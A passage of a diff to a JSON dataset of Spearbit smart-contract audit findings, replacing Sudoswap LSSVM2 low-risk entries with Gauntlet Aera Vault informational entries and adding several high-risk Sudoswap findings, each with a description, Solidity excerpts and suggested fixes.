only be set via initiateFinalization() revert Aera__FinalizationNotInitialized(); } ... }", "labels": [ "Spearbit", - "SudoswapLSSVM2", - "Severity: Low Risk" + "Gauntlet", + "Severity: Informational" ] }, { - "title": "Partial fills don't recycle ETH", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "After several fixes are applied, the following code exists.
If the sell can be filled completely then ETH is recycled, however when a partial fill is applied then ETH is not recycled. This might lead to a revert and would require doing the trade again. This costs extra gas and the trading conditions might be worse then. function swap(Order calldata swapOrder) external payable returns (uint256[] memory results) { ... // Go through each sell order ... if (pairSpotPrice == order.expectedSpotPrice) { // If the pair is an ETH pair and we opt into recycling ETH, add the output to our total accrued if (order.isETHSell && swapOrder.recycleETH) { ... ... order.pair.swapNFTsForToken(... , payable(address(this)), ... ); } // Otherwise, all tokens or ETH received from the sale go to the token recipient else { ... order.pair.swapNFTsForToken(..., swapOrder.tokenRecipient, ... ); } } // Otherwise we need to do some partial fill calculations first else { ... ... order.pair.swapNFTsForToken(..., swapOrder.tokenRecipient, ... ); // ETH not recycled } // Go through each buy order ... }", + "title": "Document the use of mustAllowlistLPs", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", + "body": "In the Mannon Vault it is important that no other accounts can use joinPool() on the Balancer pool. If other accounts were able to call joinPool(), they would get Balancer Pool Tokens (BPT) which could rise in value once more funds are added to the pool. Luckily this is prevented by the mustAllowlistLPs parameter in NewPoolParams. Readers could easily overlook this parameter. pool = IBManagedPool( IBManagedPoolFactory(factory).create( IBManagedPoolFactory.NewPoolParams({ vault: IBVault(address(0)), name: name, symbol: symbol, tokens: tokens, normalizedWeights: weights, assetManagers: managers, swapFeePercentage: swapFeePercentage, pauseWindowDuration: 0, bufferPeriodDuration: 0, owner: address(this), swapEnabledOnStart: false, mustAllowlistLPs: true, // prevents other accounts from using joinPool managementSwapFeePercentage: 0 }) ) );", "labels": [ "Spearbit", - "SudoswapLSSVM2", - "Severity: Low Risk" + "Gauntlet", + "Severity: Informational" ] }, { - "title": "Wrong allowances can be abused by the owner", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "The function call() allows transferring tokens and NFTs that have an allowance set to the pair. Normally, allowances should be given to the router, but they could be accidentally given to the pair. Although call() is protected by onlyOwner, the pair is created permissionless and so the owner could be anyone.", + "title": "finalize can be called multiple times", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", + "body": "The finalize function can be called multiple times, making it possible to waste gas for no reason and to emit a conceptually wrong Finalized event again. Currently, there's no check that prevents calling the function multiple times and there is no explicit flag to allow external sources (web app, external contract) to know whether the AeraVault has been finalized or not. Scenario: the AeraVault has already been finalized but the owner (that could be a contract and not a single EOA) is not aware of it.
He calls finalize again and wastes gas because of the external calls in a loop done in returnFunds, and emits an additional event Finalized(owner(), [0, 0, ..., 0]) with an array of zeros in the amounts event parameter.", "labels": [ "Spearbit", - "SudoswapLSSVM2", - "Severity: Low Risk" + "Gauntlet", + "Severity: Informational" ] }, { - "title": "Malicious router mitigation may break for deflationary tokens", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "ERC20 _pullTokenInputAndPayProtocolFee() for routers has a mitigation for malicious routers by checking if the before-after token balance difference is equal to the transferred amount. This will break for any ERC20 pairs with fee-on-transfer deflationary tokens (see weird-erc20). Note that there has been a real-world exploit related to this with Balancer pool and STA deflationary tokens.", + "title": "Consider updating finalize to have a more \"clean\" final state for the AeraVault/Balancer pool", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", + "body": "This is just a suggestion and not an issue per se. The finalize function should ensure that the pool is in a finalized state for both a better UX and DX. Currently, the finalize function is only withdrawing all the funds from the pool after a noticePeriod but is not ensuring that swaps have been disabled and that all the rewards, entitled to the Vault (owned by the Treasury), have been claimed.", "labels": [ "Spearbit", - "SudoswapLSSVM2", - "Severity: Low Risk" + "Gauntlet", + "Severity: Informational" ] }, { - "title": "Inconsistent royalty threshold checks allow some royalties to be equal to sale amount", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "Threshold checks on royalty amounts are implemented both in _getRoyaltyAndSpec() and its caller _calculateRoyalties(). While _calculateRoyalties() implements an inclusive check with require(saleAmount >= royaltyTotal, \"Royalty exceeds sale price\");, (allowing royalty to be equal to sale amount) the different checks in _getRoyaltyAndSpec() on the returned amounts or in the calculations on bps in _computeAmounts() exclude the saleAmount forcing royalty to be less than the saleAmount. However, only Known Origin and SuperRare are missing a similar threshold check in _getRoyaltyAndSpec(). This allows only the Known Origin and SuperRare royalties to be equal to the sale amount as enforced by the check in _calculateRoyalties().", + "title": "enableTradingWithWeights is not emitting an event for the pool's weight change", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", + "body": "enableTradingWithWeights is both changing the pool's weights and enabling the swap feature, but it's only emitting the swap-related event (done by calling setSwapEnabled). Both of those operations should be correctly tracked via events so that they can be monitored by external tools.
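A minimal sketch of what an explicit weight-change event could look like (WeightsUpdated is a hypothetical name, not present in the current code): event WeightsUpdated(uint256[] weights); function enableTradingWithWeights(uint256[] calldata weights) external override onlyOwner { // ... existing weight update and setSwapEnabled(true), which emits SetSwapEnabled ... emit WeightsUpdated(weights); // also track the weight change itself }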
", "labels": [ "Spearbit", - "SudoswapLSSVM2", - "Severity: Low Risk" + "Gauntlet", + "Severity: Informational" ] }, { - "title": "Numerical difference between getNFTQuoteForBuyOrderWithPartialFill() and _findMaxFill- ableAmtForBuy() may lead to precision errors", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "There is a slight numerical instability between the partial fill calculation and the first client side cal- culation (i.e. getNFTQuoteForSellOrderWithPartialFill() / getNFTQuoteForBuyOrderWithPartialFill(), _- findMaxFillableAmtForBuy() ). This is because getNFTQuoteForSellOrderWithPartialFill() first assumes a buy of 1 item, updates spotPrice/delta, and then gets the next subsequent quote to buy the next item. Whereas _findMaxFillableAmtForBuy() assumes buying multiple items at one time. This can for e.g. Exponential- Curve.sol and XykCurve.sol lead to minor numerical precision errors. function getNFTQuoteForBuyOrderWithPartialFill(LSSVMPair pair, uint256 numNFTs) external view returns ,! (uint256[] memory) { ... for (uint256 i; i < numNFTs; i++) { ... (, spotPrice, delta, price,,) = pair.bondingCurve().getBuyInfo(spotPrice, delta, 1, fee, ...); ... } } function getNFTQuoteForSellOrderWithPartialFill(LSSVMPair pair, uint256 numNFTs) external view returns ,! (uint256[] memory) { ... for (uint256 i; i < numNFTs; i++) { ... (, spotPrice, delta, price,,) = pair.bondingCurve().getSellInfo(spotPrice, delta, 1, fee, ... ); ... } ... } function _findMaxFillableAmtForBuy(LSSVMPair pair, uint256 maxNumNFTs, uint256[] memory ,! maxCostPerNumNFTs, uint256 ... while (start <= end) { ... (...) = pair.bondingCurve().getBuyInfo(spotPrice, delta, (start + end)/2, feeMultiplier, ,! protocolFeeMultiplier); ... } }", + "title": "Document Balancer checks", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", + "body": "Balancer has a large number of internal checks. We've discussed the use of additional checks in the Aera Vault functions. The advantage of this is that it could result in more user-friendly error messages. Additionally, it protects against potential future changes in the Balancer code. contract AeraVaultV1 is IAeraVaultV1, Ownable, ReentrancyGuard { function enableTradingWithWeights(uint256[] calldata weights) ... { ... // doesn't check weights.length pool.updateWeightsGradually(timestamp, timestamp, weights); ... } } Balancer code: function updateWeightsGradually( ..., uint256[] memory endWeights) ... { (IERC20[] memory tokens, , ) = getVault().getPoolTokens(getPoolId()); ... InputHelpers.ensureInputLengthMatch(tokens.length, endWeights.length); // length check is here ... }", "labels": [ "Spearbit", - "SudoswapLSSVM2", - "Severity: Low Risk" + "Gauntlet", + "Severity: Informational" ] }, { - "title": "Differences with Manifold version of RoyaltyEngine may cause unexpected behavior", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "Sudoswap has forked RoyaltyEngine from Manifold; however there are some differences. The Manifold version of _getRoyaltyAndSpec() also queries getRecipients(), while the Sudoswap version doesn't. This means the Sudoswap will not spread the royalties over all recipients. function _getRoyaltyAndSpec(...) // Manifold ,! ,! ...
try IEIP2981(royaltyAddress).royaltyInfo(tokenId, value) returns (address recipient, uint256 amount) { ... try IRoyaltySplitter(royaltyAddress).getRecipients() returns (Recipient[] memory splitRecipients) { ... } } } function _getRoyaltyAndSpec(...) { // Sudoswap ... try IEIP2981(royaltyAddress).royaltyInfo(tokenId, value) returns (address recipient, uint256 amount) { ... } ... } } The Manifold version of getRoyalty() has an extra try/catch compared to the Sudoswap version. This protects against reverts in the cached functions. Note: adding an extra try/catch requires the function _getRoyaltyAndSpec() to be external. function getRoyalty(address tokenAddress, uint256 tokenId, uint256 value) ... { // Manifold ... try this._getRoyaltyAndSpec{gas: 100000}(tokenAddress, tokenId, value) returns ( ... ) .... } function getRoyalty(address tokenAddress, uint256 tokenId, uint256 value) ... { // Sudoswap ... ... (...) = _getRoyaltyAndSpec(tokenAddress, tokenId, value); }", + "title": "Rename FinalizationInitialized to FinalizationInitiated for code consistency", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", + "body": "The function at L517 was renamed from initializeFinalization to initiateFinalization to avoid confusion with the Aera vault initialization. For code consistency, the corresponding event and error names should be changed.", "labels": [ "Spearbit", - "SudoswapLSSVM2", - "Severity: Low Risk" + "Gauntlet", + "Severity: Informational" ] }, { - "title": "Swaps with property-checked ERC1155 sell orders in VeryFastRouter will fail", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "Any swap batch of transactions which has a property-checked sell order for ERC1155 will revert. Given that property checks are not supported on ERC1155 pairs (only ERC721), swap sell orders for ERC1155 in VeryFastRouter will fail if order.doPropertyCheck is accidentally set, because the logic thereafter assumes it is an ERC721 order.", + "title": "Consider enforcing an explicit check on token order to avoid human error", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", + "body": "The Balancer protocol requires (and enforces during pool creation) that the pool's tokens be ordered by token address. The following functions accept a uint256[] of amounts or weights without knowing if the order inside that array follows the order of the tokens inside the Balancer pool: initialDeposit, deposit, withdraw, enableTradingWithWeights, updateWeightsGradually. While it's impossible to totally prevent human error (users could specify the correct token order but wrongly swap the input order of the amounts/weights), we could force the user to be more aware of the specific order in which the amounts/weights must be specified. A possible solution applied to initialDeposit as an example could be: function initialDeposit(IERC20[] calldata tokensSorted, uint256[] calldata amounts) external override onlyOwner { // ... other code IERC20[] memory tokens = getTokens(); // check that the tokensSorted length also matches the length of the other arrays if (tokens.length != amounts.length || tokens.length != tokensSorted.length) { revert Aera__AmountLengthIsNotSame( tokens.length, amounts.length ); } // ... other code
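// illustrative note (not in the original snippet): getTokens() is assumed here
// to return the pool's tokens already sorted by address, i.e. Balancer's order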
for (uint256 i = 0; i < tokens.length; i++) { // check that the token position associated with the amount matches the position of the token in the Balancer pool if( address(tokens[i]) != address(tokensSorted[i]) ) { revert Aera__TokenOrderIsNotSame( address(tokens[i]), address(tokensSorted[i]), i ); } depositToken(tokens[i], amounts[i]); } // ... other code } Another possible implementation would be to introduce a custom struct struct TokenAmount { IERC20 token; uint256 value; } update the function signature to function initialDeposit(TokenAmount[] calldata tokenWithAmount) and update the example code following the new parameter model. It's important to note that while this solution will not completely prevent human error, it will increase the gas consumption of each function.", "labels": [ "Spearbit", - "SudoswapLSSVM2", - "Severity: Low Risk" + "Gauntlet", + "Severity: Informational" ] }, { - "title": "changeSpotPriceAndDelta() reverts when there is enough liquidity to support 1 sell", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "changeSpotPriceAndDelta() reverts when there is enough liquidity to support 1 sell because it uses > instead of >= in the check pairBalance > newPriceToSellToPair.", + "title": "Swap is not enabled after initialDeposit execution", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", + "body": "In the current deployment flow of the AeraVault, the Balancer pool is created (by the constructor) with swapEnabledOnStart set to false. When the pool receives its initial funds via initialDeposit, the pool still has the swap functionality disabled. It is not explicitly clear in the specification document and in the code when the swap functionality should be enabled. If the protocol wants to enable swaps as soon as the funds are deposited in the pool, it should call, after bVault.joinPool(...), setSwapEnabled(true), or enableTradingWithWeights(uint256[] calldata weights) in case the external spot price is not aligned (both functions will also trigger a SetSwapEnabled event).", "labels": [ "Spearbit", - "SudoswapLSSVM2", - "Severity: Low Risk" + "Gauntlet", + "Severity: Informational" ] }, - { - "title": "Lack of support for per-token royalties may lead to incorrect royalty payments", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "The protocol currently lacks complete support for per-token royalties: it assumes that all NFTs in a pair have the same royalty and so considers the first assetId to determine royalties for all NFT token Ids in the pair. If not, the pair owner is expected to make a new pair for NFTs that have different royalties. A pair with NFTs that have different royalties will lead to incorrect royalty payments for the different NFTs.", + { + "title": "Remove commented code and replace input values with Balancer enum", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", + "body": "Inside the initialDeposit function, there is some commented code (used as an example) that should be removed for clarity and to avoid future confusion. The initUserData should not use direct input values (0 in this case) but the correct Balancer enum value, to avoid any possible confusion.
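A minimal sketch of that encoding, assuming Balancer's WeightedPoolUserData library is in scope:

// encode the INIT join kind together with the initial amounts
bytes memory initUserData = abi.encode(WeightedPoolUserData.JoinKind.INIT, amounts);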
Following the Balancer documentation (Encoding userData, JoinKind), the correct way to declare initUserData is using the WeightedPoolUserData.JoinKind.INIT enum value.", "labels": [ "Spearbit", - "SudoswapLSSVM2", - "Severity: Low Risk" + "Gauntlet", + "Severity: Informational" ] }, { - "title": "Missing additional safety for multicall may lead to lost ETH in future", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "If the function multicall() were payable, then multiple delegated-to functions could use the same msg.value, which could result in losing ETH from the pair. A future upgrade of Solidity might change the default setting for functions to payable. See Solidity issue #12539. function multicall(bytes[] calldata calls, bool revertOnFail) external onlyOwner { for (uint256 i; i < calls.length;) { (bool success, bytes memory result) = address(this).delegatecall(calls[i]); ... } }", + "title": "The Created event is not including all the information used to deploy the Balancer pool and is missing indexed properties", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", + "body": "The current Created event is defined as event Created( address indexed factory, IERC20[] tokens, uint256[] weights, address manager, address validator, uint32 noticePeriod, string description ); and is missing some of the information used to deploy the pool. To allow external tools to better monitor the deployment of the pools, it would be better to include all the information that has been used to deploy the pool on Balancer. The following information is currently missing from the event definition: name, symbol, managementFee, swapFeePercentage. The event could also define both manager and validator as indexed event parameters to allow external tools to filter those events by those values.", "labels": [ "Spearbit", - "SudoswapLSSVM2", - "Severity: Low Risk" + "Gauntlet", + "Severity: Informational" ] }, { - "title": "Missing zero-address check may allow re-initialization of pairs", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "The initialization check relies on owner() being address(0) (require(owner() == address(0), \"Initialized\");). However, without a zero-address check on _owner, this can be true even later if the pair is accidentally initialized with address(0) instead of msg.sender. This is because __Ownable_init in OwnableWithTransferCallback does not disallow address(0), unlike transferOwnership. Therefore, LSSVMPair.initialize() may be called multiple times. This is however not the case with the current implementation, where LSSVMPair.initialize() is called from LSSVMPairFactory with msg.sender as the argument for _owner.", + "title": "Rename temp variable managers to assetManagers to avoid confusion and any potential future mistakes", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", + "body": "The managers declared in the linked code (see context) are in reality Asset Managers, which have a totally different role compared to the AeraVault Manager role. The AssetManager is able to control the pool's balance, withdrawing from it or depositing into it. To avoid confusion and any potential future mistakes, it would be better to rename the temporary variable managers to a more appropriate name like assetManagers.
- address[] memory managers = new address[](tokens.length); + address[] memory assetManagers = new address[](tokens.length); for (uint256 i = 0; i < tokens.length; i++) { - managers[i] = address(this); + assetManagers[i] = address(this); } pool = IBManagedPool( IBManagedPoolFactory(factory).create( IBManagedPoolFactory.NewPoolParams({ vault: IBVault(address(0)), name: name, symbol: symbol, tokens: tokens, normalizedWeights: weights, - assetManagers: managers, + assetManagers: assetManagers, swapFeePercentage: swapFeePercentage, pauseWindowDuration: 0, bufferPeriodDuration: 0, owner: address(this), swapEnabledOnStart: false, mustAllowlistLPs: true, managementSwapFeePercentage: 0 }) ) );", "labels": [ "Spearbit", - "SudoswapLSSVM2", - "Severity: Low Risk" + "Gauntlet", + "Severity: Informational" ] }, { - "title": "Trade pair owners are allowed to change asset recipient address when it has no impact", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "Trade pair owners are allowed to change their asset recipient address using changeAssetRecipient(), while getAssetRecipient() always returns the pair address itself for Trade pairs, as expected. Trade pair owners mistakenly assume that they can change their asset recipient address using changeAssetRecipient() because they are allowed to do so successfully, but may be surprised to see that it has no effect. They may expect assets at the new address but that will not be the case.", + "title": "Move description declaration inside the storage slot code block", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", + "body": "In the current code, the description state variable is in the /// STORAGE /// block where all the immutable variables are grouped. As the dev comment says, a string cannot be immutable in bytecode but only set in the constructor, so it would be better to move it inside the /// STORAGE SLOT START /// block of variables that groups all the non-constant and non-immutable state variables.", "labels": [ "Spearbit", - "SudoswapLSSVM2", - "Severity: Low Risk" + "Gauntlet", + "Severity: Informational" ] }, { - "title": "NFT projects with custom settings and multiple royalty receivers will receive royalty only for first receiver", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "_calculateRoyalties() and its view equivalent only consider the first royalty receiver when custom settings are enabled. If non-ERC-2981 compliant NFT projects on Manifold/ArtBlocks or other platforms that support multiple royalty receivers come up with custom settings that pair owners subscribe to, then all the royalty will go to the first recipient.
Other receivers will not receive any royalties.", + "title": "Remove unused imports from code", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", + "body": "The current implementation of the AeraVaultV1 contract imports the OpenZeppelin IERC165 interface, but that interface is never used or referenced in the code.", "labels": [ "Spearbit", - "SudoswapLSSVM2", - "Severity: Low Risk" + "Gauntlet", + "Severity: Informational" ] }, { - "title": "Missing non-zero checks allow event emission spamming", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "Functions depositNFTs() and depositERC20() are meant to allow deposits into the pair post-creation. However, they do not check if non-zero NFTs or tokens are being deposited. The event emission only checks if the pair recipient is valid. Given their permissionless nature, this allows anyone to grief the system with zero NFT/token deposits, causing emission of events which may hinder indexing/monitoring systems.", + "title": "shortfall is repeated twice in IWithdrawalValidator natspec comments", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", + "body": "The word shortfall is repeated twice in the natspec comment.", "labels": [ "Spearbit", - "SudoswapLSSVM2", - "Severity: Low Risk" + "Gauntlet", + "Severity: Informational" ] }, { - "title": "Missing sanity zero-address checks may lead to undesired behavior or lock of funds", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "Certain logic requires zero-address checks to avoid undesired behavior or lock of funds. For example, in Splitter.sol#L34 users can permanently lock ETH by mistakenly using safeTransferETH with a default/zero-address value.", + "title": "Provide definition of weights & managementFee_ in the NatSpec comment", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", + "body": "The NatSpec Format is a special form of comments to provide rich documentation for functions, return variables and more. We observed an occurrence where the NatSpec comments are missing for two of the user inputs (weights & managementFee_).", "labels": [ "Spearbit", - "SudoswapLSSVM2", - "Severity: Low Risk" + "Gauntlet", + "Severity: Informational" ] }, { - "title": "Legacy NFTs are not compatible with protocol pairs", + "title": "Partial fills for buy orders in ERC1155 swaps will fail when pair has insufficient balance", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "Pairs support ERC721 and ERC1155 NFTs. However, users of NFT marketplaces may also expect to find OG NFTs such as Cryptopunks, Etherrocks or Cryptokitties, which do not adhere to these ERC standards. For example, Cryptopunks have their own internal marketplace which allows users to trade their NFTs with other users. Given that Cryptopunks does not adhere to the ERC721 standard, it will always fail when the protocol attempts to trade them. Even with wrapped versions of these NFTs, people who aren't aware or have the original version won't be able to trade them in a pair.", + "body": "Partial fills are currently supported for buy orders in VeryFastRouter.swap().
When _findMaxFillableAmtForBuy() determines numItemsToFill, it is not guaranteed that the underlying pair has that many items left to fill. While the ERC721 swap handles the scenario where the pair balance is less than numItemsToFill in the logic of _findAvailableIds() (maxIdsNeeded vs numIdsFound), the ERC1155 swap is missing a similar check and reduction of item numbers when required. Partial fills for buy orders in ERC1155 swaps will fail when the pair has a balance less than numItemsToFill as determined by _findMaxFillableAmtForBuy(). Partial filling, a key feature of VeryFastRouter, will then not work as expected and would lead to an early revert, which defeats the purpose of swap().", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Low Risk" + "Severity: High Risk" ] }, { - "title": "Unnecessary payable specifier for functions may allow ETH to be sent and locked/lost", + "title": "Function token() of cloneERC1155ERC20Pair() reads from wrong location", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "Functions LSSVMRouter.robustSwapERC20ForSpecificNFTsAndNFTsToToken() and LSSVMPair.initialize(), which do not expect to receive and process Ether, have the payable specifier, which allows interacting users to accidentally send them Ether which will get locked/lost.", + "body": "The function token() loads the token data from position 81. However, on ERC1155 pairs it should load it from position 93. Currently, it doesn't retrieve the right values and the code won't function correctly. LSSVMPair.sol: _factory := shr(0x60, calldataload(sub(calldatasize(), paramsLength))) LSSVMPair.sol: _bondingCurve := shr(0x60, calldataload(add(sub(calldatasize(), paramsLength), 20))) LSSVMPair.sol: _nft := shr(0x60, calldataload(add(sub(calldatasize(), paramsLength), 40))) LSSVMPair.sol: _poolType := shr(0xf8, calldataload(add(sub(calldatasize(), paramsLength), 60))) LSSVMPairERC1155.sol: id := calldataload(add(sub(calldatasize(), paramsLength), 61)) LSSVMPairERC721.sol: _propertyChecker := shr(0x60, calldataload(add(sub(calldatasize(), paramsLength), 61))) LSSVMPairERC20.sol: _token := shr(0x60, calldataload(add(sub(calldatasize(), paramsLength), 81))) function cloneERC1155ERC20Pair(... ) ... { assembly { ... mstore(add(ptr, 0x3e), shl(0x60, factory)) // position 0 - 20 bytes mstore(add(ptr, 0x52), shl(0x60, bondingCurve)) // position 20 - 20 bytes mstore(add(ptr, 0x66), shl(0x60, nft)) // position 40 - 20 bytes mstore8(add(ptr, 0x7a), poolType) // position 60 - 1 byte mstore(add(ptr, 0x7b), nftId) // position 61 - 32 bytes mstore(add(ptr, 0x9b), shl(0x60, token)) // position 93 - 20 bytes ... } }", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Low Risk" + "Severity: High Risk" ] }, { - "title": "Obsolete Splitter contract may lead to locked ETH/tokens", + "title": "Switched order of update leads to incorrect partial fill calculations", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "After a pair has been reclaimed via reclaimPair(), pairInfos[] will be emptied and getPrevFeeRecipientForPair() will return 0. The obsolete Splitter will however remain present, but any ETH or tokens that are sent to the contract can't be completely retrieved via withdrawETH() and withdrawTokens(). This is because getPrevFeeRecipientForPair() is 0 and the tokens would be sent to address(0).
It is unlikely though that ETH or tokens are sent to the Splitter contract as it is not used anymore. function withdrawETH(uint256 ethAmount) public { ISettings parentSettings = ISettings(getParentSettings()); ... payable(parentSettings.getPrevFeeRecipientForPair(getPairAddressForSplitter())).safeTransferETH(...); } function withdrawTokens(ERC20 token, uint256 tokenAmount) public { ISettings parentSettings = ISettings(getParentSettings()); ... token.safeTransfer(parentSettings.getPrevFeeRecipientForPair(getPairAddressForSplitter()), ...); } function getPrevFeeRecipientForPair(address pairAddress) public view returns (address) { return pairInfos[pairAddress].prevFeeRecipient; } function reclaimPair(address pairAddress) public { ... delete pairInfos[pairAddress]; ... }", + "body": "In the binary search, the update order of start and numItemsToFill is switched, with start being updated before numItemsToFill, which itself uses the value of start: start = (start + end)/2 + 1; numItemsToFill = (start + end)/2; This leads to incorrect partial fill calculations when the binary search recurses on the right half.", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Low Risk" + "Severity: High Risk" ] }, { - "title": "Divisions in getBuyInfo() and getSellInfo() may be rounded down to 0", + "title": "Swap functions with sell orders in LSSVMRouter will fail for property-check enforced pairs", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "In extreme cases (e.g. tokens with a few decimals, see this example), divisions in getBuyInfo() and getSellInfo() may be rounded down to 0. This means inputValueWithoutFee and/or outputValueWithoutFee may be 0. function getBuyInfo(..., uint256 numItems, ... ) ... { ... uint256 inputValueWithoutFee = (numItems * tokenBalance) / (nftBalance - numItems); ... } function getSellInfo(..., uint256 numItems, ... ) ... { ... uint256 outputValueWithoutFee = (numItems * tokenBalance) / (nftBalance + numItems); ... }", + "body": "Swap functions with sell orders in LSSVMRouter will revert for property-check enforced pairs. While the VeryFastRouter swap function supports sell orders specifying property check parameters for pairs enforcing them, none of the swap functions in LSSVMRouter support the same.", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Low Risk" + "Severity: High Risk" ] }, { - "title": "Last NFT in an XykCurve cannot be sold", + "title": "pairTransferERC20From() only supports ERC721 NFTs", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "The function getBuyInfo() of XykCurve enforces numItems < nftBalance, which means the last NFT can never be sold. One potential solution, as suggested by the Sudoswap team, is to set delta (=nftBalance) one higher than the real amount of NFTs. This could cause problems in other parts of the code. For example, once only one NFT is left, if we try to use changeSpotPriceAndDelta(), getBuyNFTQuote(1) will error and thus the prices (tokenBalance) and delta (nftBalance) can't be changed anymore. If nftBalance is set to one higher, then it won't satisfy pair.nft().balanceOf(pairAddress) >= 1. contract XykCurve ... { function getBuyInfo(..., uint256 numItems, ... ) ... { ... uint256 tokenBalance = spotPrice; uint256 nftBalance = delta; ...
// If numItems is too large, we will get divide by zero error if (numItems >= nftBalance) { return (Error.INVALID_NUMITEMS, 0, 0, 0, 0, 0); } ... } } function changeSpotPriceAndDelta(...) ... { ... (,,, uint256 priceToBuyFromPair,) = pair.getBuyNFTQuote(1); ... if (... && pair.nft().balanceOf(pairAddress) >= 1) { pair.changeSpotPrice(newSpotPrice); pair.changeDelta(newDelta); return; } ... } function getBuyNFTQuote(uint256 numNFTs) ... { (error, ...) = bondingCurve().getBuyInfo(..., numNFTs, ...); }", + "body": "Function pairTransferERC20From(), which is present in both LSSVMRouter and VeryFastRouter, only checks for ERC721_ERC20. This means ERC1155 NFTs are not supported by the routers. The following code is present in both LSSVMRouter and VeryFastRouter. function pairTransferERC20From(...) ... { require(factory.isPair(msg.sender, variant), \"Not pair\"); ... require(variant == ILSSVMPairFactoryLike.PairVariant.ERC721_ERC20, \"Not ERC20 pair\"); ... }", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Low Risk" + "Severity: High Risk" ] }, { - "title": "Allowing different ERC20 tokens in LSSVMRouter swaps will affect accounting and lead to undefined behavior", + "title": "Insufficient application of trading fee leads to 50% loss for LPs in swapTokenForAnyNFTs()", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "As commented: \"Note: All ERC20 swaps assume that a single ERC20 token is used for all the pairs involved. Swapping using multiple tokens in the same transaction is possible, but the slippage checks & the return values will be meaningless and may lead to undefined behavior.\" This assumption may be risky if users end up mistakenly using different ERC20 tokens in different swaps. Summing up their inputAmount and remainingValue will not be meaningful and will lead to accounting errors and undefined behavior (as noted).", + "body": "The protocol applies a trading fee of 2*tradeFee on NFT buys from pairs (to compensate for 0 fees on NFT sells, as noted in the comment: \"// We pull twice the trade fee on buys but don't take trade fee on sells if assetRecipient is set\"). While this is enforced in LSSVMPairERC721.swapTokenForSpecificNFTs() and LSSVMPairERC1155.swapTokenForSpecificNFTs(), LSSVMPairERC1155.swapTokenForAnyNFTs() enforces a trading fee of only tradeFee (instead of 2*tradeFee). Affected LPs of pairs targeted by LSSVMPairERC1155.swapTokenForAnyNFTs() will unexpectedly lose 50% of the trade fees.", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Low Risk" + 